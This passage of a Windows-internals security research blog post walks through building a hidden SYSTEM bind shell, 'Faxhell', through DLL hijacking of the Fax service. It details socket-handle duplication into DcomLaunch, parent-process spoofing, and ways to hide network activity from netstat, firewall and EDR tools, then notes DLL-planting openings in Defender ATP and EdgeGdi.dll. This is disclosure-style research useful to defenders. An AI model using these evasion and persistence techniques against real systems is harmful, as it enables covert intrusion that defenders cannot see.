Once we validated the input payload, we can print out the local and remote endpoints with GetNameInfoW, another modern API that makes SOCKADDR translation to a string easy. But our real goal is to spawn that Cmd.exe attached to the accepted socket, reparented under DcomLaunch. The simple way of achieving this is as follows:

  • Use STARTF_USESHOWWINDOW to indicate that dwFlags will have window flags, and use SW_HIDE to keep the window hidden. Also pass in CREATE_NO_WINDOW to make extra sure.
  • Use STARTF_USESTDHANDLES to indicate that hStdInput, hStdOutput, and hStdError will have valid handle values, and use the accepted socket handle to allow the other side to drive the shell.
  • And, as before, use EXTENDED_STARTUPINFO_PRESENT to set the lpAttributeList which contains the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS that has a handle back to DcomLaunch.

And when it works (it doesn’t yet), the result should look something like this (do you even notice the Cmd.exe?)


However, such a shell will instantly exit. Recall that when reparenting, all fork like behaviors, including handle inheritance, will come from the parent, not the creator. And the handles we’ve passed in as STDIN and others must be inheritable, and must exist… in the parent.

Therefore, we must first make sure that the socket handles are inheritable, which is thankfully the default when using WSASocket (there is a flag, WSA_FLAG_NO_HANDLE_INHERIT, to disable this functionality). But, more importantly, we must make sure that the socket exists in DcomLaunch – not in Fax.

Unfortunately, if you search the Internet on how to duplicate a socket, you’ll find the WSADuplicateSocket API. This API isn’t “hands-free” – the receiving side must actively call socket again, and pass in a data structure that was returned (and somehow copied) by the sending side. Now we’d have to inject code into DcomLaunch and perform other highly suspicious action.

Hold on – if sockets are supposed to be inheritable by default, such that they can be used as input/output handles for a new process, doesn’t this mean that the kernel (which handles process creation) can somehow duplicate the socket (inheritance is just another form of duplication) through the object manager, without specialized Winsock APIs? In fact, if you try using DuplicateHandle yourself on a socket, you’ll see that it works just fine, despite repeated warnings from MSDN and other sources.

That’s not to say those warnings or documentation are wrong. Yes, in certain cases, if you have various Layered Service Providers (LSPs) installed, or use esoteric non TCP/IP sockets that are mostly implemented in user-space, the duplicated socket will be completely unusable.

Ultimately, for sockets owned by Afd.sys, which is the kernel IFS (Installable File System) implementation of Windows Sockets, the operation works just fine, and the resulting socket is perfectly usable – and has certain perks. Therefore, we must set hStdInput to the socket’s handle index in DcomLaunch, after we’ve duplicated it (thankfully, DuplicateHandle tells us what the resulting handle index is).

Recall that one of the advantages of AcceptEx is that it expects the accepted socket handle as input, unlike accept that returns it after the connection is made. This benefit means that we can actually open a handle to DcomLaunch while we impersonate SYSTEM, create the local accept socket, and then immediately duplicate it.

Merely duplicating an unbound socket doesn’t notify any firewall/WFP/EDR callback, and isn’t shown as being attached to anything (as is the case), and it also means that when our I/O callback function executes, we can actually immediately close our side of the accept socket, since the underlying AFD Endpoint is now being referenced by DcomLaunch too.

In our implementation, however, we chose to leave the socket alive until after we launch Cmd.exe, so that we could return error messages back to the client if needed.

Going back to our CreateProcess call, there’s just one last step before we can use the duplicated socket. If you read various Internet sources on how to bind the shell to a socket, you’ll see that the technique works fine when creating reverse shells, but not so much with bind shells (at least, according to Stack Overflow).

PoCs online and various forums suggest that the only way of achieving the intended result is to first create a series of named pipes, have threads pumping all the network I/O through the pipe, and then set the pipes as STDIN/OUT for the child process. Wow, that’s a lot of work, and we’re lazy.

Well, upon further reading, it turns out that the real problem is this: standard terminal handles are meant to be fully synchronous (“non-overlapped”), and socket creates overlapped (“non-blocking”) socket handles. The solution is to then use setsockopt to bring them back to “blocking” mode – or, to leverage the simple fact that WSASocket does not have this behavior, unless WSA_FLAG_OVERLAPPED is passed in, which is not the default, but which our code was using.

You see, what’s tricky is that AcceptEx itself is an Overlapped I/O API – that’s why it works with our entire thread pool based approach. So not passing in WSA_FLAG_OVERLAPPED means that we can no longer use the API, or a thread pool, or the entire approach we’re going for. That said, once again, the benefit of AcceptEx separately accepting the other socket (the one that will be bound to the client, and duplicated into DcomLaunch to serve as the STDIN/OUT handle) as input is a life saver. We can create the listening socket as overlapped, and then create the accepting socket as non-overlapped, having our cake and eating it too.

As last, we now combine everything together and have a functional CreateProcess call which creates a hidden Cmd.exe that’s bound to the client socket, and the client can start manipulating our remote machine. Now sounds like about the right time to dump a demo screenshot to get that conference applause.

But, this blog post isn’t quite 6000 words yet, so we’re not done with the Windows internals, as there’s a few extra tidbits.

Duplicated Sockets and Evasion

First, if you use Netstat with the “-b” flag, or Process Hacker, or Process Monitor, you’ll not see a single socket inside of DcomLaunch. Indeed, the entire connection still appears as if driven by from Fxssvc.exe. Even better, if we’d allow the Fax service to exit (which we didn’t want in our implementation), Netstat will show System and Process Monitor seems to completely hide the network I/O. Additionally, any BFE or WFP-based tools will see traffic as if coming from Fxssvc.exe, and Windows Firewall rules will apply to that process, and not DcomLaunch. Look at this screenshot below, of our Netcat connection above:


This behavior is due to a glaring oversight in allowing DuplicateHandle on sockets but not fully making Afd.sys capable of correctly handling the security implications. Ultimately, because the AFD Endpoint is the same, the duplicate handle is just an additional reference – and all ownership of the socket still belongs to the original creator – even when the creator exists (and actually, because Netio.sys is still referencing the original EPROCESS, the creator and the PID become “zombies” and leak resources).

Here’s Windbg showing Fxssvc.exe and its reference count while it’s running:


And here it is after terminating the process — notice how there’s still 8 leaking references:


This behavior was actually discovered and told to us by a good friend – the creator of Process Hacker. It was submitted to Microsoft years ago, but – stop us if you’ve heard this one before – it’s not a security boundary, it’s by design. Certainly, a design which all EDR/Firewall/DFIR vendors all know about, since it’s so clearly documented, right?

The last internals behavior we use is in how we send data back to the client in error situations (a lot can go wrong with creating our Cmd.exe) – we don’t use the send API. Instead, we use yet another “lookup-by-GUID” functionality of Winsock 2.2, which is TransmitPackets. This is a more generic version of TransmitFile, an API that once got Microsoft in trouble, for building end-to-end file transfer directly into the kernel, which was once considered anticompetitive and dangerous (these days, Linux has exactly the same functionality).

TransmitPackets allows you to specify a set of virtual addresses — or file handles — and has a dozen flags to fine tune how this data should be sent – including through worker threads (the default) or through Kernel APCs (the faster way). We thought it’d be fun to use it, which again makes the payload import less obvious socket APIs, makes analysis a bit harder, and has a minute performance again in the off chance there’s an error packet to send. It also avoids LSPs or other EDR hooks on traditional APIs like accept, recv, send, socket — and even the IOCTLs sent to Afd.sys are different.

Putting this all together, we now have our I/O callback calling WaitForSingleObject to wait for the Cmd.exe to exit when the client disconnects. We’re good citizens and use the CallbackMayRunLong thread pool API not to hold things up — note that we could have used the WaitCallback functionality of the thread pool, to asynchronous be notified when the shell exits, but that would’ve added more complexity that at this point just wasn’t worth it.

Once the Cmd.exe terminates, the I/O callback completes, which then wakes up the work callback, which then wakes up the UalStart thread. In our code, it goes back into a loop, and starts the whole operation again. Certainly, we could’ve cached a bunch of data to make this easier, but we opted for the simpler approach. And you could also make it to that Fxssvc.exe exits and this while logic is hosted somewhere else, or etc., etc., etc. We’re not actually NSA operators, so we’ll leave that to the real implant writers.

A last note on this: if you like using this unknown DLL but, unlike us, don’t mind restarting the machine, you can always restart and let Spoolsv.exe load Ualapi.dll when it starts running. This process starts on boot and runs as SYSTEM, which saves us a lot of the work — in that case we will just need to open our bind shell:


Of course, most people do notice when their computer restarts out of nowhere. And if you plan on waiting for the machine to restart for an unrelated reason (update, crash, etc.) you might be waiting a very long time, as many servers only go down a few times a year for a scheduled update and neither of us can remember the last time we restarted our computers. But hey, maybe you’re playing the long game. We don’t judge. Much.

ATP Bonus Round

This was a lot of reading and effort for a simple DLL hijacking attack. Maybe you just want something a lot simpler. And not have to worry about custom exports and a funny named DLL. Well, Windows 10 provides exactly what you need, and takes you straight to SYSTEM without any of this work. How could something like this work? Well, you’ve probably heard of Windows Defender ATP. What you might not know is that “ATP” stands for “Accommodating To Planting”.

In fact, every single DLL that it loads suffers from a load ordering issue, where the current directory takes precedence over System32. But that’s OK — this is clearly a 3rd party tool, not from a security-focused team, and understanding the internals of load ordering is hard, so we can be understanding:


Of course, things aren’t as easy as they might seem at first, as ATP does have a number of mitigations in place to avoid nonchalant abuse of this behavior:

  • The Service Control Manager (SCM) will start it as a Windows Protected Process Light (PPL) which will require your DLL to be Microsoft-signed (or some PPL/signature bypass, like the ones shown at Recon 2019 by James Forshaw and Alex).
  • Mssecflt.sys / Sgrmagent.sys have capabilities to detect this type of attack, in combination with Windows Defender and System Guard Runtime Monitor Attestations (Octagon).

That being said, using the PreferSystem32Images mitigation would certainly clean up this behavior.

Windows Manganese (21H1) Post-Credits Scene

OK, OK, let’s stop making fun of the OS Vendor’s EDR tool. The team was acquired, not native to Microsoft, and DLL hijacking isn’t even a security boundary. It’s not like the OS itself would ever have issues like these… right? Right??? Continuing in the tradition of ever-increasing quality and static analysis tools and totally-not-throwing-the-SDL-out-the-Window, the next version of Windows 10 just adds a built-in DLL planting vector to every privileged process — EdgeGdi.dll. The latest builds now hard-code loading this DLL directly into Gdi32.dll — a fact which we noticed alongside @decoder_it on Twitter:


Yep — a new function CheckIsEdgeGdiProcessOnce was added — which makes every GUI process now vulnerable to this DLL planting attack. Ah, security… why even bother?

Show Me The Code!

We’ve implemented the end-to-end functionality described here in our GitHub project Faxhell, which is a pun on the pronunciation of the word “Fax” (Facs) and “Shell” — while also making the words “Fax Hell”. Because Alex likes naming things in silly ways.

Read our other blog posts:

Symbolic Hooks Part 4: The App Container Traverse-ty

After getting the driver in Part 3 of our blog to load and adding a DbgPrintEx statement in our hook, we managed to get all the paths that were being opened without crashing the machine. We got really excited thinking we were done. But as soon as we clicked on the Start Menu, we noticed things had gone awry – it wasn’t starting up at all, and when we launched Process Monitor from SysInternals, we could see ShellExperienceHost.exe crashing. We tried other applications, which ran fine but still, the machine was pretty much unusable. So, we relaunched our IDA and WinDbg and went hunting for more bugs.

Continue reading “Symbolic Hooks Part 4: The App Container Traverse-ty”

Symbolic Hooks Part 3: The Remainder Theorem

We ended the second part with, unsurprisingly, a bugcheck. We tried to redirect all access to the C: volume to our device in order to get information about all the paths that are being accessed, but the first time anyone tried opening the C: volume itself, the I/O manager threw a DRIVER_RETURNED_STATUS_REPARSE_FOR_VOLUME_OPEN blue screen at us.

Unfortunately, we can’t return any other status code than STATUS_REPARSE or the path will not be parsed properly and a lot of things will break in the system as our fake device now becomes the “file system” of this poor path. But what if we could find a way to never have to return STATUS_REPARSE for volume opens, because we never see a volume open to begin with?

Continue reading “Symbolic Hooks Part 3: The Remainder Theorem”